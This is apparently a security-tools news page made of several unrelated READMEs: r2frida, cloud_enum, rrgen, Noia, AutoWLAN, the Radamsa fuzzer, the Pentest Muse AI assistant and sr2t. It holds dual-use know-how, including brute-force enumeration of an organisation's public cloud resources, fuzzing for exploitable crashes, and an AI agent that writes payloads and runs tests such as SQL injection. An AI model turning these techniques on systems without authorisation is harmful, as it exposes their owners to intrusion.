If you are willing to install and use r2frida natively on Android via Termux, there are some caveats with the library dependencies because of some symbol resolutions. The way to make this work is by extending the LD_LIBRARY_PATH environment to point to the system directory before the termux libdir.

$ LD_LIBRARY_PATH=/system/lib64:$LD_LIBRARY_PATH r2 frida://...

Troubleshooting

Ensure you are using a modern version of r2 (preferibly last release or git).

Run r2 -L | grep frida to verify if the plugin is loaded, if nothing is printed use the R2_DEBUG=1 environment variable to get some debugging messages to find out the reason.

If you have problems compiling r2frida you can use r2env or fetch the release builds from the GitHub releases page, bear in mind that only MAJOR.MINOR version must match, this is r2-5.7.6 can load any plugin compiled on any version between 5.7.0 and 5.7.8.

Design

 +---------+
| radare2 | The radare2 tool, on top of the rest
+---------+
:
+----------+
| io_frida | r2frida io plugin
+----------+
:
+---------+
| frida | Frida host APIs and logic to interact with target
+---------+
:
+-------+
| app | Target process instrumented by Frida with Javascript
+-------+

Credits

This plugin has been developed by pancake aka Sergi Alvarez (the author of radare2) for NowSecure.

I would like to thank Ole André for writing and maintaining Frida as well as being so kind to proactively fix bugs and discuss technical details on anything needed to make this union to work. Kudos



Cloud_Enum - Multi-cloud OSINT Tool. Enumerate Public Resources In AWS, Azure, And Google Cloud


Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.

Currently enumerates the following:

Amazon Web Services: - Open / Protected S3 Buckets - awsapps (WorkMail, WorkDocs, Connect, etc.)

Microsoft Azure: - Storage Accounts - Open Blob Storage Containers - Hosted Databases - Virtual Machines - Web Apps

Google Cloud Platform - Open / Protected GCP Buckets - Open / Protected Firebase Realtime Databases - Google App Engine sites - Cloud Functions (enumerates project/regions with existing functions, then brute forces actual function names) - Open Firebase Apps


See it in action in Codingo's video demo here.


Usage

Setup

Several non-standard libaries are required to support threaded HTTP requests and dns lookups. You'll need to install the requirements as follows:

pip3 install -r ./requirements.txt

Running

The only required argument is at least one keyword. You can use the built-in fuzzing strings, but you will get better results if you supply your own with -m and/or -b.

You can provide multiple keywords by specifying the -k argument multiple times.

Keywords are mutated automatically using strings from enum_tools/fuzz.txt or a file you provide with the -m flag. Services that require a second-level of brute forcing (Azure Containers and GCP Functions) will also use fuzz.txt by default or a file you provide with the -b flag.

Let's say you were researching "somecompany" whose website is "somecompany.io" that makes a product called "blockchaindoohickey". You could run the tool like this:

./cloud_enum.py -k somecompany -k somecompany.io -k blockchaindoohickey

HTTP scraping and DNS lookups use 5 threads each by default. You can try increasing this, but eventually the cloud providers will rate limit you. Here is an example to increase to 10.

./cloud_enum.py -k keyword -t 10

IMPORTANT: Some resources (Azure Containers, GCP Functions) are discovered per-region. To save time scanning, there is a "REGIONS" variable defined in cloudenum/azure_regions.py and cloudenum/gcp_regions.py that is set by default to use only 1 region. You may want to look at these files and edit them to be relevant to your own work.

Complete Usage Details

usage: cloud_enum.py [-h] -k KEYWORD [-m MUTATIONS] [-b BRUTE]

Multi-cloud enumeration utility. All hail OSINT!

optional arguments:
-h, --help show this help message and exit
-k KEYWORD, --keyword KEYWORD
Keyword. Can use argument multiple times.
-kf KEYFILE, --keyfile KEYFILE
Input file with a single keyword per line.
-m MUTATIONS, --mutations MUTATIONS
Mutations. Default: enum_tools/fuzz.txt
-b BRUTE, --brute BRUTE
List to brute-force Azure container names. Default: enum_tools/fuzz.txt
-t THREADS, --threads THREADS
Threads for HTTP brute-force. Default = 5
-ns NAMESERVER, --nameserver NAMESERVER
DNS server to use in brute-force.
-l LOGFILE, --logfile LOGFILE
Will APPEND found items to specified file.
-f FORMAT, --format FORMAT
Format for log file (text,json,csv - defaults to text)
--disable-aws Disable Amazon checks.
--disable-azure Disable Azure checks.
--disable-gcp Disable Google checks.
-qs, --quickscan Disable all mutations and second-level scans

Thanks

So far, I have borrowed from: - Some of the permutations from GCPBucketBrute



Rrgen - A Header Only C++ Library For Storing Safe, Randomly Generated Data Into Modern Containers


This library was developed to combat insecure methods of storing random data into modern C++ containers. For example, old and clunky PRNGs. Thus, rrgen uses STL's distribution engines in order to efficiently and safely store a random number distribution into a given C++ container.


Installation

1) git clone https://github.com/josh0xA/rrgen.git
2) cd rrgen
3) make
4) Add include/rrgen.hpp to your project tree for access to the library classes and functions.

Official Documentation

rrgen/docs/index.rst

Supported Containers

1) std::vector<>
2) std::list<>
3) std::array<>
4) std::stack<>

Example Usages

#include "../include/rrgen.hpp"
#include <iostream>

int main(void)
{
// Example usage for rrgen vector
rrgen::rrand<float, std::vector, 10> rrvec;
rrvec.gen_rrvector(false, true, 0, 10);
for (auto &i : rrvec.contents())
{
std::cout << i << " ";
} // ^ the same as rrvec.show_contents()

// Example usage for rrgen list (frontside insertion)
rrgen::rrand<int, std::list, 10> rrlist;
rrlist.gen_rrlist(false, true, "fside", 5, 25);
std::cout << '\n'; rrlist.show_contents();
std::cout << "Size: " << rrlist.contents().size() << '\n';

// Example usage for rrgen array
rrgen::rrand_array<int, 5> rrarr;
rrarr.gen_rrarray(false, true, 5, 35);
for (auto &i : rrarr.contents())
{
std::cout << i << " ";
} // ^ the same as rrarr. show_contents()

// Example usage for rrgen stack
rrgen::rrand_stack<float, 10> rrstack;
rrstack.gen_rrstack(false, true, 200, 1000);
for (auto m = rrstack.xsize(); m > 0; m--)
{
std::cout << rrstack.grab_top() << " ";
rrstack.pop_off();
if (m == 1) { std::cout << '\n'; }
}
}

Note: This is a transferred repository, from a completely unrelated project.



Noia - Simple Mobile Applications Sandbox File Browser Tool


Noia is a web-based tool whose main aim is to ease the process of browsing mobile applications sandbox and directly previewing SQLite databases, images, and more. Powered by frida.re.

Please note that I'm not a programmer, but I'm probably above the median in code-savyness. Try it out, open an issue if you find any problems. PRs are welcome.


Installation & Usage

npm install -g noia
noia

Features

  • Explore third-party applications files and directories. Noia shows you details including the access permissions, file type and much more.

  • View custom binary files. Directly preview SQLite databases, images, and more.

  • Search application by name.

  • Search files and directories by name.

  • Navigate to a custom directory using the ctrl+g shortcut.

  • Download the application files and directories for further analysis.

  • Basic iOS support

and more


Setup

Desktop requirements:

  • node.js LTS and npm
  • Any decent modern desktop browser

Noia is available on npm, so just type the following command to install it and run it:

npm install -g noia
noia

Device setup:

Noia is powered by frida.re, thus requires Frida to run.

Rooted Device

See: * https://frida.re/docs/android/ * https://frida.re/docs/ios/

Non-rooted Device

  • https://koz.io/using-frida-on-android-without-root/
  • https://github.com/sensepost/objection/wiki/Patching-Android-Applications
  • https://nowsecure.com/blog/2020/01/02/how-to-conduct-jailed-testing-with-frida/

Security Warning

This tool is not secure and may include some security vulnerabilities so make sure to isolate the webpage from potential hackers.

LICENCE

MIT



AutoWLAN - Run A Portable Access Point On A Raspberry Pi Making Use Of Docker Containers


This project will allow you run a portable access point on a Raspberry Pi making use of Docker containers.

Further reference and explanations:

https://fwhibbit.es/en/automatic-access-point-with-docker-and-raspberry-pi-zero-w

Tested on Raspberry Pi Zero W.


Access point configurations

You can customize the network password and other configurations on files at confs/hostapd_confs/. You can also add your own hostapd configuration files here.

Management using plain docker

Add --rm for volatile containers.

Create and run a container with default (Open) configuration (stop with Ctrl+C)
docker run --name autowlan_open --cap-add=NET_ADMIN --network=host  autowlan
Create and run a container with WEP configuration (stop with Ctrl+C)
docker run --name autowlan_wep --cap-add=NET_ADMIN --network=host -v $(pwd)/confs/hostapd_confs/wep.conf:/etc/hostapd/hostapd.conf autowlan
Create and run a container with WPA2 configuration (stop with Ctrl+C)
docker run --name autowlan_wpa2 --cap-add=NET_ADMIN --network=host -v $(pwd)/confs/hostapd_confs/wpa2.conf:/etc/hostapd/hostapd.conf autowlan
Stop a running container
docker stop autowlan_{open|wep|wpa2}

Management using docker-compose

Create and run container (stop with Ctrl+C)
docker-compose -f <fichero_yml> up
Create and run container in the background
docker-compose -f <fichero_yml> up  -d
Stop a container in the background
docker-compose -f <fichero_yml> down
Read logs of a container in the background
docker-compose -f <fichero_yml> logs


Radamsa - A General-Purpose Fuzzer


Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestringly different outputs from them. The main selling points of radamsa are that it has already found a slew of bugs in programs that actually matter, it is easily scriptable and, easy to get up and running.


Nutshell:

 $ # please please please fuzz your programs. here is one way to get data for it:
$ sudo apt-get install gcc make git wget
$ git clone https://gitlab.com/akihe/radamsa.git && cd radamsa && make && sudo make install
$ echo "HAL 9000" | radamsa

What the Fuzz

Programming is hard. All nontrivial programs have bugs in them. What's more, even the simplest typical mistakes are in some of the most widely used programming languages usually enough for attackers to gain undesired powers.

Fuzzing is one of the techniques to find such unexpected behavior from programs. The idea is simply to subject the program to various kinds of inputs and see what happens. There are two parts in this process: getting the various kinds of inputs and how to see what happens. Radamsa is a solution to the first part, and the second part is typically a short shell script. Testers usually have a more or less vague idea what should not happen, and they try to find out if this is so. This kind of testing is often referred to as negative testing, being the opposite of positive unit- or integration testing. Developers know a service should not crash, should not consume exponential amounts of memory, should not get stuck in an infinite loop, etc. Attackers know that they can probably turn certain kinds of memory safety bugs into exploits, so they fuzz typically instrumented versions of the target programs and wait for such errors to be found. In theory, the idea is to counterprove by finding a counterexample a theorem about the program stating that for all inputs something doesn't happen.

There are many kinds of fuzzers and ways to apply them. Some trace the target program and generate test cases based on the behavior. Some need to know the format of the data and generate test cases based on that information. Radamsa is an extremely "black-box" fuzzer, because it needs no information about the program nor the format of the data. One can pair it with coverage analysis during testing to likely improve the quality of the sample set during a continuous test run, but this is not mandatory. The main goal is to first get tests running easily, and then refine the technique applied if necessary.

Radamsa is intended to be a good general purpose fuzzer for all kinds of data. The goal is to be able to find issues no matter what kind of data the program processes, whether it's xml or mp3, and conversely that not finding bugs implies that other similar tools likely won't find them either. This is accomplished by having various kinds of heuristics and change patterns, which are varied during the tests. Sometimes there is just one change, sometimes there a slew of them, sometimes there are bit flips, sometimes something more advanced and novel.

Radamsa is a side-product of OUSPG's Protos Genome Project, in which some techniques to automatically analyze and examine the structure of communication protocols were explored. A subset of one of the tools turned out to be a surprisingly effective file fuzzer. The first prototype black-box fuzzer tools mainly used regular and context-free formal languages to represent the inferred model of the data.

Requirements

Supported operating systems: * GNU/Linux * OpenBSD * FreeBSD * Mac OS X * Windows (using Cygwin)

Software requirements for building from sources: * gcc / clang * make * git * wget

Building Radamsa

 $ git clone https://gitlab.com/akihe/radamsa.git
$ cd radamsa
$ make
$ sudo make install # optional, you can also just grab bin/radamsa
$ radamsa --help

Radamsa itself is just a single binary file which has no external dependencies. You can move it where you please and remove the rest.

Fuzzing with Radamsa

This section assumes some familiarity with UNIX scripting.

Radamsa can be thought as the cat UNIX tool, which manages to break the data in often interesting ways as it flows through. It has also support for generating more than one output at a time and acting as a TCP server or client, in case such things are needed.

Use of radamsa will be demonstrated by means of small examples. We will use the bc arbitrary precision calculator as an example target program.

In the simplest case, from scripting point of view, radamsa can be used to fuzz data going through a pipe.

 $ echo "aaa" | radamsa
aaaa

Here radamsa decided to add one 'a' to the input. Let's try that again.

 $ echo "aaa" | radamsa
ːaaa

Now we got another result. By default radamsa will grab a random seed from /dev/urandom if it is not given a specific random state to start from, and you will generally see a different result every time it is started, though for small inputs you might see the same or the original fairly often. The random state to use can be given with the -s parameter, which is followed by a number. Using the same random state will result in the same data being generated.

 $ echo "Fuzztron 2000" | radamsa --seed 4
Fuzztron 4294967296

This particular example was chosen because radamsa happens to choose to use a number mutator, which replaces textual numbers with something else. Programmers might recognize why for example this particular number might be an interesting one to test for.

You can generate more than one output by using the -n parameter as follows:

 $ echo "1 + (2 + (3 + 4))" | radamsa --seed 12 -n 4
1 + (2 + (2 + (3 + 4?)
1 + (2 + (3 +?4))
18446744073709551615 + 4)))
1 + (2 + (3 + 170141183460469231731687303715884105727))

There is no guarantee that all of the outputs will be unique. However, when using nontrivial samples, equal outputs tend to be extremely rare.

What we have so far can be used to for example test programs that read input from standard input, as in

 $ echo "100 * (1 + (2 / 3))" | radamsa -n 10000 | bc
[...]
(standard_in) 1418: illegal character: ^_
(standard_in) 1422: syntax error
(standard_in) 1424: syntax error
(standard_in) 1424: memory exhausted
[hang]

Or the compiler used to compile Radamsa:

 $ echo '((lambda (x) (+ x 1)) #x124214214)' | radamsa -n 10000 | ol
[...]
> What is 'ó µ'?
4901126677
> $

Or to test decompression:

 $ gzip -c /bin/bash | radamsa -n 1000 | gzip -d > /dev/null

Typically however one might want separate runs for the program for each output. Basic shell scripting makes this easy. Usually we want a test script to run continuously, so we'll use an infinite loop here:

 $ gzip -c /bin/bash > sample.gz
$ while true; do radamsa sample.gz | gzip -d > /dev/null; done

Notice that we are here giving the sample as a file instead of running Radamsa in a pipe. Like cat Radamsa will by default write the output to stdout, but unlike cat when given more than one file it will usually use only one or a few of them to create one output. This test will go about throwing fuzzed data against gzip, but doesn't care what happens then. One simple way to find out if something bad happened to a (simple single-threaded) program is to check whether the exit value is greater than 127, which would indicate a fatal program termination. This can be done for example as follows:

 $ gzip -c /bin/bash > sample.gz
$ while true
do
radamsa sample.gz > fuzzed.gz
gzip -dc fuzzed.gz > /dev/null
test $? -gt 127 && break
done

This will run for as long as it takes to crash gzip, which hopefully is no longer even possible, and the fuzzed.gz can be used to check the issue if the script has stopped. We have found a few such cases, the last one of which took about 3 months to find, but all of them have as usual been filed as bugs and have been promptly fixed by the upstream.

One thing to note is that since most of the outputs are based on data in the given samples (standard input or files given at command line) it is usually a good idea to try to find good samples, and preferably more than one of them. In a more real-world test script radamsa will usually be used to generate more than one output at a time based on tens or thousands of samples, and the consequences of the outputs are tested mostly in parallel, often by giving each of the output on command line to the target program. We'll make a simple such script for bc, which accepts files from command line. The -o flag can be used to give a file name to which radamsa should write the output instead of standard output. If more than one output is generated, the path should have a %n in it, which will be expanded to the number of the output.

 $ echo "1 + 2" > sample-1
$ echo "(124 % 7) ^ 1*2" > sample-2
$ echo "sqrt((1 + length(10^4)) * 5)" > sample-3
$ bc sample-* < /dev/null
3
10
5
$ while true
do
radamsa -o fuzz-%n -n 100 sample-*
bc fuzz-* < /dev/null
test $? -gt 127 && break
done

This will again run up to obviously interesting times indicated by the large exit value, or up to the target program getting stuck.

In practice many programs fail in unique ways. Some common ways to catch obvious errors are to check the exit value, enable fatal signal printing in kernel and checking if something new turns up in dmesg, run a program under strace, gdb or valgrind and see if something interesting is caught, check if an error reporter process has been started after starting the program, etc.

Output Options

The examples above all either wrote to standard output or files. One can also ask radamsa to be a TCP client or server by using a special parameter to -o. The output patterns are:

-o argument meaning example
:port act as a TCP server in given port # radamsa -o :80 -n inf samples/*.http-resp
ip:port connect as TCP client to port of ip $ radamsa -o 127.0.0.1:80 -n inf samples/*.http-req
- write to stdout $ radamsa -o - samples/*.vt100
path write to files, %n is testcase # and %s the first suffix $ radamsa -o test-%n.%s -n 100 samples/*.foo

Remember that you can use e.g. tcpflow to record TCP traffic to files, which can then be used as samples for radamsa.

Related Tools

A non-exhaustive list of free complementary tools:

  • GDB (http://www.gnu.org/software/gdb/)
  • Valgrind (http://valgrind.org/)
  • AddressSanitizer (http://code.google.com/p/address-sanitizer/wiki/AddressSanitizer)
  • strace (http://sourceforge.net/projects/strace/)
  • tcpflow (http://www.circlemud.org/~jelson/software/tcpflow/)

A non-exhaustive list of related free tools: * American fuzzy lop (http://lcamtuf.coredump.cx/afl/) * Zzuf (http://caca.zoy.org/wiki/zzuf) * Bunny the Fuzzer (http://code.google.com/p/bunny-the-fuzzer/) * Peach (http://peachfuzzer.com/) * Sulley (http://code.google.com/p/sulley/)

Tools which are intended to improve security are usually complementary and should be used in parallel to improve the results. Radamsa aims to be an easy-to-set-up general purpose shotgun test to expose the easiest (and often severe due to being reachable from via input streams) cracks which might be exploitable by getting the program to process malicious data. It has also turned out to be useful for catching regressions when combined with continuous automatic testing.

Some Known Results

A robustness testing tool is obviously only good only if it really can find non-trivial issues in real-world programs. Being a University-based group, we have tried to formulate some more scientific approaches to define what a 'good fuzzer' is, but real users are more likely to be interested in whether a tool has found something useful. We do not have anyone at OUSPG running tests or even developing Radamsa full-time, but we obviously do make occasional test-runs, both to assess the usefulness of the tool, and to help improve robustness of the target programs. For the test-runs we try to select programs that are mature, useful to us, widely used, and, preferably, open source and/or tend to process data from outside sources.

The list below has some CVEs we know of that have been found by using Radamsa. Some of the results are from our own test runs, and some have been kindly provided by CERT-FI from their tests and other users. As usual, please note that CVE:s should be read as 'product X is now more robust (against Y)'.

CVE program credit
CVE-2007-3641 libarchive OUSPG
CVE-2007-3644 libarchive OUSPG
CVE-2007-3645 libarchive OUSPG
CVE-2008-1372 bzip2 OUSPG
CVE-2008-1387 ClamAV OUSPG
CVE-2008-1412 F-Secure OUSPG
CVE-2008-1837 ClamAV OUSPG
CVE-2008-6536 7-zip OUSPG
CVE-2008-6903 Sophos Anti-Virus OUSPG
CVE-2010-0001 Gzip integer underflow in unlzw
CVE-2010-0192 Acroread OUSPG
CVE-2010-1205 libpng OUSPG
CVE-2010-1410 Webkit OUSPG
CVE-2010-1415 Webkit OUSPG
CVE-2010-1793 Webkit OUSPG
CVE-2010-2065 libtiff found by CERT-FI
CVE-2010-2443 libtiff found by CERT-FI
CVE-2010-2597 libtiff found by CERT-FI
CVE-2010-2482 libtiff found by CERT-FI
CVE-2011-0522 VLC found by Harry Sintonen
CVE-2011-0181 Apple ImageIO found by Harry Sintonen
CVE-2011-0198 Apple Type Services found by Harry Sintonen
CVE-2011-0205 Apple ImageIO found by Harry Sintonen
CVE-2011-0201 Apple CoreFoundation found by Harry Sintonen
CVE-2011-1276 Excel found by Nicolas Grégoire of Agarri
CVE-2011-1186 Chrome OUSPG
CVE-2011-1434 Chrome OUSPG
CVE-2011-2348 Chrome OUSPG
CVE-2011-2804 Chrome/pdf OUSPG
CVE-2011-2830 Chrome/pdf OUSPG
CVE-2011-2839 Chrome/pdf OUSPG
CVE-2011-2861 Chrome/pdf OUSPG
CVE-2011-3146 librsvg found by Sauli Pahlman
CVE-2011-3654 Mozilla Firefox OUSPG
CVE-2011-3892 Theora OUSPG
CVE-2011-3893 Chrome OUSPG
CVE-2011-3895 FFmpeg OUSPG
CVE-2011-3957 Chrome OUSPG
CVE-2011-3959 Chrome OUSPG
CVE-2011-3960 Chrome OUSPG
CVE-2011-3962 Chrome OUSPG
CVE-2011-3966 Chrome OUSPG
CVE-2011-3970 libxslt OUSPG
CVE-2012-0449 Firefox found by Nicolas Grégoire of Agarri
CVE-2012-0469 Mozilla Firefox OUSPG
CVE-2012-0470 Mozilla Firefox OUSPG
CVE-2012-0457 Mozilla Firefox OUSPG
CVE-2012-2825 libxslt found by Nicolas Grégoire of Agarri
CVE-2012-2849 Chrome/GIF OUSPG
CVE-2012-3972 Mozilla Firefox found by Nicolas Grégoire of Agarri
CVE-2012-1525 Acrobat Reader found by Nicolas Grégoire of Agarri
CVE-2012-2871 libxslt found by Nicolas Grégoire of Agarri
CVE-2012-2870 libxslt found by Nicolas Grégoire of Agarri
CVE-2012-2870 libxslt found by Nicolas Grégoire of Agarri
CVE-2012-4922 tor found by the Tor project
CVE-2012-5108 Chrome OUSPG via NodeFuzz
CVE-2012-2887 Chrome OUSPG via NodeFuzz
CVE-2012-5120 Chrome OUSPG via NodeFuzz
CVE-2012-5121 Chrome OUSPG via NodeFuzz
CVE-2012-5145 Chrome OUSPG via NodeFuzz
CVE-2012-4186 Mozilla Firefox OUSPG via NodeFuzz
CVE-2012-4187 Mozilla Firefox OUSPG via NodeFuzz
CVE-2012-4188 Mozilla Firefox OUSPG via NodeFuzz
CVE-2012-4202 Mozilla Firefox OUSPG via NodeFuzz
CVE-2013-0744 Mozilla Firefox OUSPG via NodeFuzz
CVE-2013-1691 Mozilla Firefox OUSPG
CVE-2013-1708 Mozilla Firefox OUSPG
CVE-2013-4082 Wireshark found by cons0ul
CVE-2013-1732 Mozilla Firefox OUSPG
CVE-2014-0526 Adobe Reader X/XI Pedro Ribeiro ([email protected])
CVE-2014-3669 PHP
CVE-2014-3668 PHP
CVE-2014-8449 Adobe Reader X/XI Pedro Ribeiro ([email protected])
CVE-2014-3707 cURL Symeon Paraschoudis
CVE-2014-7933 Chrome OUSPG
CVE-2015-0797 Mozilla Firefox OUSPG
CVE-2015-0813 Mozilla Firefox OUSPG
CVE-2015-1220 Chrome OUSPG
CVE-2015-1224 Chrome OUSPG
CVE-2015-2819 Sybase SQL vah_13 (ERPScan)
CVE-2015-2820 SAP Afaria vah_13 (ERPScan)
CVE-2015-7091 Apple QuickTime Pedro Ribeiro ([email protected])
CVE-2015-8330 SAP PCo agent Mathieu GELI (ERPScan)
CVE-2016-1928 SAP HANA hdbxsengine Mathieu Geli (ERPScan)
CVE-2016-3979 SAP NetWeaver @ret5et (ERPScan)
CVE-2016-3980 SAP NetWeaver @ret5et (ERPScan)
CVE-2016-4015 SAP NetWeaver @vah_13 (ERPScan)
CVE-2016-4015 SAP NetWeaver @vah_13 (ERPScan)
CVE-2016-9562 SAP NetWeaver @vah_13 (ERPScan)
CVE-2017-5371 SAP ASE OData @vah_13 (ERPScan)
CVE-2017-9843 SAP NETWEAVER @vah_13 (ERPScan)
CVE-2017-9845 SAP NETWEAVER @vah_13 (ERPScan)
CVE-2018-0101 Cisco ASA WebVPN/AnyConnect @saidelike (NCC Group)

We would like to thank the Chromium project and Mozilla for analyzing, fixing and reporting further many of the above mentioned issues, CERT-FI for feedback and disclosure handling, and other users, projects and vendors who have responsibly taken care of uncovered bugs.

Thanks

The following people have contributed to the development of radamsa in code, ideas, issues or otherwise.

  • Darkkey
  • Branden Archer

Troubleshooting

Issues in Radamsa can be reported to the issue tracker. The tool is under development, but we are glad to get error reports even for known issues to make sure they are not forgotten.

You can also drop by at #radamsa on Freenode if you have questions or feedback.

Issues your programs should be fixed. If Radamsa finds them quickly (say, in an hour or a day) chances are that others will too.

Issues in other programs written by others should be dealt with responsibly. Even fairly simple errors can turn out to be exploitable, especially in programs written in low-level languages. In case you find something potentially severe, like an easily reproducible crash, and are unsure what to do with it, ask the vendor or project members, or your local CERT.

FAQ

Q: If I find a bug with radamsa, do I have to mention the tool?
A: No.

Q: Will you make a graphical version of radamsa?

A: No. The intention is to keep it simple and scriptable for use in automated regression tests and continuous testing.

Q: I can't install! I don't have root access on the machine!
A: You can omit the $ make install part and just run radamsa from bin/radamsa in the build directory, or copy it somewhere else and use from there.

Q: Radamsa takes several GB of memory to compile!1
A: This is most likely due to an issue with your C compiler. Use prebuilt images or try the quick build instructions in this page.

Q: Radamsa does not compile using the instructions in this page!
A: Please file an issue at https://gitlab.com/akihe/radamsa/issues/new if you don't see a similar one already filed, send email ([email protected]) or IRC (#radamsa on freenode).

Q: I used fuzzer X and found much more bugs from program Y than Radamsa did.
A: Cool. Let me know about it ([email protected]) and I'll try to hack something X-ish to radamsa if it's general purpose enough. It'd also be useful to get some samples which you used to check how well radamsa does, because it might be overfitting some heuristic.

Q: Can I get support for using radamsa?
A: You can send email to [email protected] or check if some of us happen to be hanging around at #radamsa on freenode.

Q: Can I use radamsa on Windows?
A: An experimental Windows executable is now in Downloads, but we have usually not tested it properly since we rarely use Windows internally. Feel free to file an issue if something is broken.

Q: How can I install radamsa?
A: Grab a binary from downloads and run it, or $ make && sudo make install.

Q: How can I uninstall radamsa?
A: Remove the binary you grabbed from downloads, or $ sudo make uninstall.

Q: Why are many outputs generated by Radamsa equal?
A: Radamsa doesn't keep track which outputs it has already generated, but instead relies on varying mutations to keep the output varying enough. Outputs can often be the same if you give a few small samples and generate lots of outputs from them. If you do spot a case where lots of equal outputs are generated, we'd be interested in hearing about it.

Q: There are lots of command line options. Which should I use for best results?
A: The recommended use is $ radamsa -o output-%n.foo -n 100 samples/*.foo, which is also what is used internally at OUSPG. It's usually best and most future proof to let radamsa decide the details.

Q: How can I make radamsa faster?
A: Radamsa typically writes a few megabytes of output per second. If you enable only simple mutations, e.g. -m bf,bd,bi,br,bp,bei,bed,ber,sr,sd, you will get about 10x faster output.

Q: What's with the funny name?
A: It's from a scene in a Finnish children's story. You've probably never heard about it.

Q: Is this the last question?
A: Yes.

Warnings

Use of data generated by radamsa, especially when targeting buggy programs running with high privileges, can result in arbitrarily bad things to happen. A typical unexpected issue is caused by a file manager, automatic indexer or antivirus scanner trying to do something to fuzzed data before they are being tested intentionally. We have seen spontaneous reboots, system hangs, file system corruption, loss of data, and other nastiness. When in doubt, use a disposable system, throwaway profile, chroot jail, sandbox, separate user account, or an emulator.

Not safe when used as prescribed.

This product may contain faint traces of parenthesis.



Pentest-Muse-Cli - AI Assistant Tailored For Cybersecurity Professionals


Pentest Muse is an AI assistant tailored for cybersecurity professionals. It can help penetration testers brainstorm ideas, write payloads, analyze code, and perform reconnaissance. It can also take actions, execute command line codes, and iteratively solve complex tasks.


Pentest Muse Web App

In addition to this command-line tool, we are excited to introduce the Pentest Muse Web Application! The web app has access to the latest online information, and would be a good AI assistant for your pentesting job.

Disclaimer

This tool is intended for legal and ethical use only. It should only be used for authorized security testing and educational purposes. The developers assume no liability and are not responsible for any misuse or damage caused by this program.

Requirements

  • Python 3.12 or later
  • Necessary Python packages as listed in requirements.txt

Setup

Standard Setup

  1. Clone the repository:

git clone https://github.com/pentestmuse-ai/PentestMuse cd PentestMuse

  1. Install the required packages:

pip install -r requirements.txt

Alternative Setup (Package Installation)

Install Pentest Muse as a Python Package:

pip install .

Running the Application

Chat Mode (Default)

In the chat mode, you can chat with pentest muse and ask it to help you brainstorm ideas, write payloads, and analyze code. Run the application with:

python run_app.py

or

pmuse

Agent Mode (Experimental)

You can also give Pentest Muse more control by asking it to take actions for you with the agent mode. In this mode, Pentest Muse can help you finish a simple task (e.g., 'help me do sql injection test on url xxx'). To start the program with agent model, you can use:

python run_app.py agent

or

pmuse agent

Selection of Language Models

Managed APIs

You can use Pentest Muse with our managed APIs after signing up at www.pentestmuse.ai/signup. After creating an account, you can simply start the pentest muse cli, and the program will prompt you to login.

OpenAI API keys

Alternatively, you can also choose to use your own OpenAI API keys. To do this, you can simply add argument --openai-api-key=[your openai api key] when starting the program.

Contact

For any feedback or suggestions regarding Pentest Muse, feel free to reach out to us at [email protected] or join our discord. Your input is invaluable in helping us improve and evolve.



Sr2T - Converts Scanning Reports To A Tabular Format


Scanning reports to tabular (sr2t)

This tool takes a scanning tool's output file, and converts it to a tabular format (CSV, XLSX, or text table). This tool can process output from the following tools:

  1. Nmap (XML);
  2. Nessus (XML);
  3. Nikto (XML);
  4. Dirble (XML);
  5. Testssl (JSON);
  6. Fortify (FPR).

Rationale

This tool can offer a human-readable, tabular format which you can tie to any observations you have drafted in your report. Why? Because then your reviewers can tell that you, the pentester, investigated all found open ports, and looked at all scanning reports.

Dependencies

  1. argparse (dev-python/argparse);
  2. prettytable (dev-python/prettytable);
  3. python (dev-lang/python);
  4. xlsxwriter (dev-python/xlsxwriter).

Install

Using Pip:

pip install --user sr2t

Usage

You can use sr2t in two ways:

  • When installed as package, call the installed script: sr2t --help.
  • When Git cloned, call the package directly from the root of the Git repository: python -m src.sr2t --help
$ sr2t --help
usage: sr2t [-h] [--nessus NESSUS [NESSUS ...]] [--nmap NMAP [NMAP ...]]
[--nikto NIKTO [NIKTO ...]] [--dirble DIRBLE [DIRBLE ...]]
[--testssl TESTSSL [TESTSSL ...]]
[--fortify FORTIFY [FORTIFY ...]] [--nmap-state NMAP_STATE]
[--nmap-services] [--no-nessus-autoclassify]
[--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE]
[--nessus-tls-file NESSUS_TLS_FILE]
[--nessus-x509-file NESSUS_X509_FILE]
[--nessus-http-file NESSUS_HTTP_FILE]
[--nessus-smb-file NESSUS_SMB_FILE]
[--nessus-rdp-file NESSUS_RDP_FILE]
[--nessus-ssh-file NESSUS_SSH_FILE]
[--nessus-min-severity NESSUS_MIN_SEVERITY]
[--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH]
[--nessus-sort-by NESSUS_SORT_BY]
[--nikto-description-width NIKTO_DESCRIPTION_WIDTH]< br/> [--fortify-details] [--annotation-width ANNOTATION_WIDTH]
[-oC OUTPUT_CSV] [-oT OUTPUT_TXT] [-oX OUTPUT_XLSX]
[-oA OUTPUT_ALL]

Converting scanning reports to a tabular format

optional arguments:
-h, --help show this help message and exit
--nmap-state NMAP_STATE
Specify the desired state to filter (e.g.
open|filtered).
--nmap-services Specify to ouput a supplemental list of detected
services.
--no-nessus-autoclassify
Specify to not autoclassify Nessus results.
--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE
Specify to override a custom Nessus autoclassify YAML
file.
--nessus-tls-file NESSUS_TLS_FILE
Specify to override a custom Nessus TLS findings YAML
file.
--nessus-x509-file NESSUS_X509_FILE
Specify to override a custom Nessus X.509 findings
YAML file.
--nessus-http-file NESSUS_HTTP_FILE
Specify to override a custom Nessus HTTP findings YAML
file.
--nessus-smb-file NESSUS_SMB_FILE
Specify to override a custom Nessus SMB findings YAML
file.
--nessus-rdp-file NESSUS_RDP_FILE
Specify to override a custom Nessus RDP findings YAML
file.
--nessus-ssh-file NESSUS_SSH_FILE
Specify to override a custom Nessus SSH findings YAML
file.
--nessus-min-severity NESSUS_MIN_SEVERITY
Specify the minimum severity to output (e.g. 1).
--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH
Specify the width of the pluginid column (e.g. 30).
--nessus-sort-by NESSUS_SORT_BY
Specify to sort output by ip-address, port, plugin-id,
plugin-name or severity.
--nikto-description-width NIKTO_DESCRIPTION_WIDTH
Specify the width of the description column (e.g. 30).
--fortify-details Specify to include the Fortify abstracts, explanations
and recommendations for each vulnerability.
--annotation-width ANNOTATION_WIDTH
Specify the width of the annotation column (e.g. 30).
-oC OUTPUT_CSV, --output-csv OUTPUT_CSV
Specify the output CSV basename (e.g. output).
